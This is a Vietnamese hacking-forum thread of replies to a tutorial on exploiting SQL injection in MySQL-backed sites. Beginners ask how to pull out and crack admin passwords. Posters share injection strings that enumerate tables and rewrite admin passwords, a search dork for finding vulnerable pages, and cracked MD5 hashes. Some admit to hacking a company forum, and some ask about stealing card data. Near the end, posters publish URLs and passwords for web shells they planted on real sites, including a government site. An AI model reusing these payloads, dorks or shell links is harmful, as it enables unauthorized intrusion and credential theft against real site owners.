=> datbase là SQL server, lỗi là do truy vấn UNION SELECT [color=red]TOP 1[/color] TABLE_NAME FROM INFORMATION_SCHEMA.TABLES– sai trường và table. em kết luận vấy chuẩn chưa ạ?

Tôi đã nói là bạn hãy học kỹ SQL đối với từng loại database rồi hãy hỏi.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

thực sự em mò mẫm SQL và em đã hiểu các lệnh truy vấn của nó nhưng SQL đối với từng loại database thì em ko tìm đâu ra tài liệu. mong mấy bác tư vấn dùm các thắc mắc của em nha'... hu...

Hướng dẫn khai thác SQL Injection đối với MySQL

joaqujn — GMT

Cho mình hỏi với MySQL v3 liệu có cách nào khai thác ko?

Hướng dẫn khai thác SQL Injection đối với MySQL

phamlenhan555 — GMT

mún làm thử thì dow cái testermysql của ông ML về chạy thử tui cũng đang học cái này đây

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

conmale wrote:

constructor_87 wrote:

thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)
Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu? 99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.

hầu như password thu đc thời buổi này đều đc "mã hóa" như bác nói. có lẽ sql injection "lỗi thời" thật rồi bác à! mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?

Hướng dẫn khai thác SQL Injection đối với MySQL

StarGhost — GMT

@constructor_87: thế còn những queries như DROP, INSERT, UPDATE thì có lỗi thời không bạn? Sao lại thấy cái gì cứ mã hóa là chịu thua vậy?

Hướng dẫn khai thác SQL Injection đối với MySQL

sovietw0rm — GMT

constructor_87 wrote:

conmale wrote:

constructor_87 wrote:

thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)
Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu? 99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.
hầu như password thu đc thời buổi này đều đc "mã hóa" như bác nói. có lẽ sql injection "lỗi thời" thật rồi bác à! mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?

sai lầm lớn nhất là câu này "mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?"

Hướng dẫn khai thác SQL Injection đối với MySQL

sovietw0rm — GMT

joaqujn wrote:

Cho mình hỏi với MySQL v3 liệu có cách nào khai thác ko?

mysql v3 có cách khai thác, với mysql v3 không dùng union được vì nó không có vì vậy kỹ thuật inband sqli có lẽ là không dùng được, nhưng blind thì được ...

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

@StarGhost: em chỉ muốn thâm nhập chứ ko dám hack mà bác. làm như bác hư hết "hàng hóa" :( @sovietw0rm: why ?

Hướng dẫn khai thác SQL Injection đối với MySQL

pdah — GMT

Tôi để ý từ lần đầu tiên bạn constructor_87 post bài ở topic này đến bây giờ là tròn 2 tuần rồi, anh em đã nhắc bạn phải học SQL cho thật đàng hoàng rồi hãy tiếp tục nói chuyện rồi cơ mà. Thời gian 2 tuần là quá đủ để bạn biết những thứ sơ đẳng về SQL và những thứ xung quanh nó (nếu bạn thực sự nghiêm túc) và tránh hàng tá câu phát ngôn + hỏi bừa bãi như trên. Sorry bạn nếu bài viết này hơi nặng lời.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

thứ nhất: đã học SQL thì cũng hiểu phần nào chứ sao có thể hiểu hết đc sql injection thứ hai: dựa vào kiến thức tự mình tìm hiểu đc mình thấy các bác phản bác câu hỏi của mình vô lý mình phải hỏi ngược lại cho ra nhẽ (bổ sung luôn lỗ hỗng của mình) chứ có gì lại bảo về ôm sách mà đọc thì ....

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

thứ nhất: đã học SQL thì cũng hiểu phần nào chứ sao có thể hiểu hết đc sql injection thứ hai: dựa vào kiến thức tự mình tìm hiểu đc mình thấy các bác phản bác câu hỏi của mình vô lý mình phải hỏi ngược lại cho ra nhẽ (bổ sung luôn lỗ hỗng của mình) chứ có gì lại bảo về ôm sách mà đọc thì ....

---> sao cứ nhập nhằng chuyện kiến thức sql và chuyện sql injection mãi thế? Muốn hiểu được sql injection thì trước tiên phải thấu đáo sql statement (cụ thể cho từng loại database). Ngay cả một câu sql đơn giản bị báo lỗi mà còn không biết lý do tại sao thì làm sao mà "inject"? Khi nào nắm vững sql statements, khi ấy tự nhiên sẽ ngộ ra sql injection là cái gì thôi. Chưa đi được thì đừng cố chạy.

Hướng dẫn khai thác SQL Injection đối với MySQL

quanta — GMT

Khổ quá, ở HVA (cụ thể là anh conmale) chỉ muốn truyền đạt cho mọi người mấy cái chân lý "vô cùng đơn giản" thế này thôi: - Dùng cái gì thì đọc tài liệu về cái đó - Muốn 'hack' cái gì thì phải hiểu thật rõ cái đó - Luôn luôn phải xây cái "móng" trước và xây cho thật vững, đừng cố đốt cháy giai đoạn - Luôn luôn thể hiện mình đã mày mò, tìm tòi trước khi hỏi ... Bạn nào "ngộ" ra được mấy cái chân lý này thì sẽ nhanh tiến bộ (và có khi lại từ bỏ ý định hack hiếc này nọ, quay về cày quốc kiếm $ nuôi vợ con) còn bạn nào không hiểu hoặc cố tình không hiểu thì đành chịu vậy. PS: Còn thiếu cái "chân lý" nào ai bổ sung giúp mình với.

Hướng dẫn khai thác SQL Injection đối với MySQL

tranhuuphuoc — GMT

Còn, em . :D Có công mài cây sắt có ngày thành cây .... xà beng :-) Không ai chỉ, cho hay bán cho bạn "bí kiếp" để thành công ngoài việc bạn thành công bằng chính sự nổ lực, nghiên cứu tìm tòi của chính bản thân của bạn . Mạo muội vài dòng 8

Hướng dẫn khai thác SQL Injection đối với MySQL

yeucodon — GMT

em nghĩ bác admin nên mở riêng 1 topic cho ae bên này chứ em thấy hướng dẫn mà đọc mỏi mắt toàn thấy các bác ấy "đi lạc chủ đề" thôi ạ

Hướng dẫn khai thác SQL Injection đối với MySQL

momiado_9x — GMT

Mấy bác cho em hỏi tí, đối với các shop mà khi bắt lỗi như trên thì nó báo thế này : No products match your search. thì phải dùng cách nào hả mấy bác ??? P/S :sao em không đánh được tiếng việt trong forum ta nhỉ?

Hướng dẫn khai thác SQL Injection đối với MySQL

caotrienx — GMT

Mình hack được user/pass: admin:57c4b03b07d5b098b92a0205dcca66d5 chuỗi md5 này ko giải mã được Theo 1 bài viết có cách hướng dẫn đổi pass hoặc record 1 newuser/newpass(newpass được đã được giải mã) khi biết được các table va column Để thay đổi password , có thể làm như sau: http://yoursite.com/index.php?id=10 UPDATE 'admin_login' SET 'password'= 'newpass' WHERE login_name='admin'-- Hoặc nếu bạn muốn một record mới(tạo một newuser/newpass) vào table: http://yoursite.com/index.php?id=10 INSERT INTO 'admin_login'('login_id', 'login_name', 'password') VALUES(`1`,'admin1','newpass')-- mình thử nhưng ko được kể cả khi chuyển login_name sang hex newuser=admin1=61646d696e31 INSERT INTO 'admin_login' ('login_id', 'login_name', 'password') VALUES (`1`, `0x61646d696e31`, `bf15876b12c0a194dcb842c3ec9cb078`)-- Ai cho mình biết sai ở đâu ko!

Hướng dẫn khai thác SQL Injection đối với MySQL

hacker_lo_mo — GMT

Các bạn cho mình hỏi. Sau khi lấy biết được các bảng nhạy cảm như admin, (tbl_admin), nhưng password đã bị băm. Vậy đến đây thì ngoài việc đi giải băm MD5 (mà gần như mình chưa thấy trang nào hỗ trợ tìm clear-text từ MD5), thì có kỹ thuật nào để tiếp tục tấn công khôg các bác ?

Hướng dẫn khai thác SQL Injection đối với MySQL

heocaca — GMT

nbthanh wrote:

Bài viết rất hay và xúc tích! Đây là 1 ví dụ kinh điển nhất cho - "muốn hack thì phải GIỎI những thứ CĂN BẢN / NỀN TẢNG trước như lập trình, SQL, v.v..." - và "khi đã GIỎI những thứ CĂN BẢN / NỀN TẢNG rồi thì tự nhiên sẽ biết hack" Chẳng hạn như không biết lập trình, không biết SQL, không biết những thứ nền tảng này thì có biết site bị lỗi cũng không biết đường nào mà khai thác.

Bạn ơi, người VN hay giấu nghề lắm, các pro giờ muốn bỏ rơi các noobie, nên nói vậy đó, một noopbi luôn có câu hỏi làm sao biết 1 web site lỗi SQL, mình sẽ cho bạn 1 thủ thuật có thế quét lỗi bất kì một trang web nào thông qua công cụ SQL Inject Me , có lẽ sẽ thoả mãn câu hỏi của bạn. :^) (click vô link dưới đây) Cách quét lỗi SQL với mọi Website => http://my.opera.com/heocacavltk1/blog/show.dml/18190232 :D [i]

Hướng dẫn khai thác SQL Injection đối với MySQL

jizuba — GMT

các bác làm ơn cho em mạo muội hỏi 1 câu này nhá: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC Microsoft Access Driver] Data type mismatch in criteria expression. như bên trên là sao vậy :-/ .em chưa biết gì

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

jizuba wrote:

các bác làm ơn cho em mạo muội hỏi 1 câu này nhá: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC Microsoft Access Driver] Data type mismatch in criteria expression. như bên trên là sao vậy :-/ .em chưa biết gì

Là qua bên mục "Windows" và mở một chủ đề mới về "vỡ lòng MS SQL".

Hướng dẫn khai thác SQL Injection đối với MySQL

khucyeuthuong2 — GMT

cho em hỏi "Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1", ta có thể tìm được link này với bất kỳ trang web nào không?và bằng cách nào vậy?anh em giúp cho.em mới học nên còn kém lắm.thanks

Hướng dẫn khai thác SQL Injection đối với MySQL

Mr.uot — GMT

khucyeuthuong2 wrote:

cho em hỏi "Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1", ta có thể tìm được link này với bất kỳ trang web nào không?và bằng cách nào vậy?anh em giúp cho.em mới học nên còn kém lắm.thanks

cái này muốn tìm thì vào google search

inurl: products.php?id=

rồi check từng site bạn à:">

Hướng dẫn khai thác SQL Injection đối với MySQL

wkiamiuemth — GMT

em vừa gặp một trang dùng mySQL mà em đã tiến hành khai thác nó. đã ra cái username và pass của admin (pass không mã hoá) nhưng mà sao em ko thể dùng cái acc này để đăng nhập được như những acc thông thường (toàn báo sai username hoặc pass). vậy các anh có thể chỉ cho em là tại sao như thế không ạ. em là newbie mong các anh nhẹ nhàng góp ý. ps: lúc đăng nhập trang này ngoài yêu cầu name và pass còn thêm phần mã ảnh để đăng nhập, các anh giải thích giùm em luôn là mã ảnh đó để làm j nữa.thanks

Hướng dẫn khai thác SQL Injection đối với MySQL

NT08 — GMT

Sau khi biết đc tên database và user nhưng nó dấu link admin (hoặc chặn ip truy cập vào Admin) thì làm thế nào các bác?

Hướng dẫn khai thác SQL Injection đối với MySQL

nqthangonline — GMT

@all newbie : google kiếm ebook hacking cc của hieuitpc mà đọc mà ngẫm cho kĩ nếu vẫn không hiểu thì đừng vào đây hỏi nữa nqthangonline cũng vào đây từ lâu lắm rồi mà chẳng giám hỏi gì nè hj hj @seamon : được gặp thầy ở đây hjhj

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

classical — GMT

h0ainiemdauyeu wrote:

lỗi này bây giờ đã fix hết rồi ,kiếm site bị lỗi kiểu này thực tập khó quá :(

E cũng nghĩ thế! Nhưng e thấy bài viết này hữu ích quá :x Biết cách còn đề phòng :P

Hướng dẫn khai thác SQL Injection đối với MySQL

minhhath — GMT

bài viết chỉ hướng dẫn Khai thác SQL Injection trong Basic PHP Events Lister 1.0 nhưng còn trong ASP.net viết bằng ngôn ngữ C# thì em thấy áp dụng cách trên không có tác dụng gì anh nào pro chỉ em cái nha. Thanks đã đọc bài viết này

Hướng dẫn khai thác SQL Injection đối với MySQL

tvv — GMT

Cảm ơn bài viết của anh Seamoun .Nhờ bài viết của anh em mới phần nào hiểu được cách thức hoạt động của mấy cái tool SQL Injection .Hy vọng là xẽ có nhiều bài như vậy nữa :D . Chỉnh lại chút : Đọc xong bài này có nhiều câu hỏi và câu trả lời vui thật .Em đọc giữa khuya mà cười ko chịu nổi .Thank tất cả !

Hướng dẫn khai thác SQL Injection đối với MySQL

he0k0n — GMT

tuy e mới vào forum nhưng theo e biết thì diễn đàn này được lập ra là để a e học tập là chính chứ không phải phá hoại! mong a e đừng có nhờ hack cái site này hay là deface cái site kia!(có sai gì mong a e bỏ qua cho thank! )

Hướng dẫn khai thác SQL Injection đối với MySQL

Yona — GMT

Cám ơn các anh em đang rất thích cái món này ! Hix thank các anh ha !

Hướng dẫn khai thác SQL Injection đối với MySQL

punkrock — GMT

hihi. hôm nay mới hack đc forum BB công ty mình nhờ cái sql injection này :x. hacking thật là thú vị.

Hướng dẫn khai thác SQL Injection đối với MySQL

zeropoint — GMT

caotrienx wrote:

Mình hack được user/pass: admin:57c4b03b07d5b098b92a0205dcca66d5 chuỗi md5 này ko giải mã được Theo 1 bài viết có cách hướng dẫn đổi pass hoặc record 1 newuser/newpass(newpass được đã được giải mã) khi biết được các table va column Để thay đổi password , có thể làm như sau: http://yoursite.com/index.php?id=10 UPDATE 'admin_login' SET 'password'= 'newpass' WHERE login_name='admin'-- Hoặc nếu bạn muốn một record mới(tạo một newuser/newpass) vào table: http://yoursite.com/index.php?id=10 INSERT INTO 'admin_login'('login_id', 'login_name', 'password') VALUES(`1`,'admin1','newpass')-- mình thử nhưng ko được kể cả khi chuyển login_name sang hex newuser=admin1=61646d696e31 INSERT INTO 'admin_login' ('login_id', 'login_name', 'password') VALUES (`1`, `0x61646d696e31`, `bf15876b12c0a194dcb842c3ec9cb078`)-- Ai cho mình biết sai ở đâu ko!

Nói chung MySQL không phân biệt được lệnh bạn viết gì! vì phía sau select mà thêm câu lệnh insert,update, delete là sai vì phía sau nó là where hoặc union nói đơn giản là Nên học câu lệnh truy vấn trong SQL đi!

Hướng dẫn khai thác SQL Injection đối với MySQL

onelove88 — GMT

cho em hỏi cái em dùng SQL sever 2005 ,em dùng phần mềm SQL Server Management Studio Express để code em dùng câu lệnh sau: select * from san_Pham union select convert(int,GardenpassWorld+'a'),'1','1','1','1','1','1' from admin_Garden lỗi hiên trên SQL Server Management: Conversion failed when converting the nvarchar value '123456a' to data type int. nhưng khi em chèn mã lệnh vào :http://localhost/theGarden/DetailProduct.aspx?id=7 union select convert(int,GardenpassWorld+'a'),'1','1','1','1','1','1' from admin_Garden lôi hiên trên trình duyệt: Incorrect syntax near 'a'. cho em hỏi sao lại báo lỗi khác nhau thế ạ ,vì câu lệnh sau thì báo lỗi giống nhau select * from san_Pham union select stuff(GardenpassWorld,1,1,'a'),'1','1','1','1','1','1' from admin_Garden Conversion failed when converting the nvarchar value 'a23456' to data type int. Em đánh sai gì mong các anh thông cảm

Hướng dẫn khai thác SQL Injection đối với MySQL

thanhhuy12th — GMT

Bài viết rất hay để tham khảo nhưng: "From: louisnguyen27: @seamoun như vậy social engineering là rất quan trọng trong việc khai thác lỗi. Có khi nào đoán hoài mà vẫn không ra tên bảng và các trường không?" Lúc đầu có lỗi " chỗ sau id=1 thêm ' " thì mới khai thác lỗi được, còn không nếu không xuất hiện thì......Never nhĩ???

Hướng dẫn khai thác SQL Injection đối với MySQL

zeropoint — GMT

Một câu hỏi rất hay chủ yếu là ta phải đoán được họ dùng câu lệnh truy vấn như thế nào và họ fix chưa? Nếu fix rồi thì đoán cách họ đang fix từ đó ta mới quyết định đi tiếp hay dừng lại! Bài viết chỉ mang tính tổng quang mà thôi còn việc áp dụng thì còn phải dự vào bản thân và kinh nghiệm về truy vấn Cơ Sở Dữ Liệu nữa!

Hướng dẫn khai thác SQL Injection đối với MySQL

chimung — GMT

E thấy chủ đề hay thế này mà có nhiều câu hỏi vu vơ quá nên mạo muội hỏi các bậc đàn anh:"Ngoài việc dùng order by để tìm số cột lỗi còn có cách khác ko?" P/s:Sao người viết lại sử dụng union select 1,1,1,1,... để xác định cột lỗi thay vì union select 1,2,3,4 vậy?

Hướng dẫn khai thác SQL Injection đối với MySQL

havuanhle — GMT

Khi get user name với database name, nhưng get table lại dính 403 thì làm sao nhỉ? Và một số site khi query lại hiện trang trắng kèm lỗi, có cách nào khai thác được không ạ Mong các bác giải đáp.

Hướng dẫn khai thác SQL Injection đối với MySQL

anti-love — GMT

Thực ra bài viết này rất bổ ích nhưng trường hợp lỗi SQL kiểu này thì chỉ xuất hiện ở một số wwebsite nhỏ, có cơ chế bảo mật không tốt. chứ nhưng site to con thì hầu như không thể khai thác đc SQL kiểu này Mà phải tìm qua lỗi củA Email admin hoặc used của member để khai thác. luk nào có thời gian mình sẽ post lên cho mọi người tham khảo

Hướng dẫn khai thác SQL Injection đối với MySQL

zeropoint — GMT

Đâu nhất thiết phải tìm cột đâu bạn? Không cần biết cột vẫn có thể truy vấn dữ liệu được mà!(blind) Còn tại sao select 1,1,... khác select 1,2,... thì bạn cứ thử đi rồi bạn sẽ thấy khác biệt.

Hướng dẫn khai thác SQL Injection đối với MySQL

khicon2893 — GMT

e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON MD5 !! dùng findmyhash mà giải mã cậu ah!!

Hướng dẫn khai thác SQL Injection đối với MySQL

Kikirum — GMT

khicon2893 wrote:

e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON MD5 !! dùng findmyhash mà giải mã cậu ah!!

Dạo này còn hack shop lấy đc cc không bác, mình đọc mấy ebook của hieupc ,tìm hiểu thêm trên mạng nữa , shop lỗi thì tìm ra nhưng mà làm theo mấy cái code của hiếu pc thì nó chẳng ra cái colum nào cả. hic...

Hướng dẫn khai thác SQL Injection đối với MySQL

manh.kqha — GMT

Anh Ad ơi. Ngoài hướng khai thác lỗi thông qua kiểm tra bằng dấu "'" sau chuỗi truy vấn này, về SQL Injection có những hướng khác không? Ad hướng dẫn anh em các phương pháp khác đi. Bây giờ tìm được mội site mắc lỗi này đề test cũng không dễ.

Hướng dẫn khai thác SQL Injection đối với MySQL

hacking.zombie — GMT

Bây giờ mình thấy đều sử dụng framework để truy xuất database ví dụ django của python, rail của ruby,.. vậy tại sao vẫn bị lỗi SQL ??? Mình lập trình ứng dụng mạng nhưng mới chạy local host không hề có đoạn code SQL nào.

Hướng dẫn khai thác SQL Injection đối với MySQL

ken002 — GMT

Vậy nếu url đã rewrite thì làm thế nào hả bác?

Hướng dẫn khai thác SQL Injection đối với MySQL

sparrowvn — GMT

URL rewrite cũng khai thác như bình thường ban xem link này nhé https://www.youtube.com/watch?v=ROu2DclkMAY, mặc dù link cũ nhưng vẫn thế. Mình đã check site này vẫn đang bị sql nhưng ngạc nhiên là vẫn được báo là Vulnerability free. Hài thật

Hướng dẫn khai thác SQL Injection đối với MySQL

hocquantrimang — GMT

đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.

Hướng dẫn khai thác SQL Injection đối với MySQL

sparrowvn — GMT

hocquantrimang wrote:

đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.

Do trong giới hạn của bài viết và yêu cầu, nên mình không muốn bình phẩm về chuyện tay hay tool. Về nguyên tắc thì tất cả những gì user có thể input đều sẽ được đưa vào ứng dụng, tuỳ theo ứng dụng có thể điểm input sẽ khác nhau và tất nhiên tuỳ theo khả năng nhận biết cùa hacker hoặc người muốn test. Skill và experience là những yếu tố mấu chốt đối với tester cũng như hacker Về chuyện tool hay tay, các bạn có thể xem 1 bài viết (khá cũ nhưng vẫn xem được) tại http://www.slideshare.net/itasvietnam/itasautomated-web-applicationscannervi. Các quyết đị tool nào hay tay nào sẽ là quyết định của chính bạn

Hướng dẫn khai thác SQL Injection đối với MySQL

vipluckystar — GMT

Cho mình hỏi mình chiếm quyền quản trị và upload shell thành công nhưng lại ko login được vào shell dù đã đúng user/pass hay bỏ code check đi thì phải làm sao? demo: http://pscells.net/upload/sanpham12.php hacker http://pscells.net/upload/sanpham18.php imhacker/fogetit http://pscells.net/upload/test.php /

Hướng dẫn khai thác SQL Injection đối với MySQL

hackermiennui — GMT

http://thutuchanhchinh.daknong.gov.vn/uploads/files/T4_2014/shell.asp pass: a1b Làm gì khi có cái này

Hướng dẫn khai thác SQL Injection đối với MySQL

mrminhlong — GMT

các bác có nghĩ là 1 site có lỗi SQL injec nhưng lại không tìm đk table users của nó không? em tình cờ khai thác đk lỗi này trên 1 site nhưng khi truy vấn thì không thấy users :D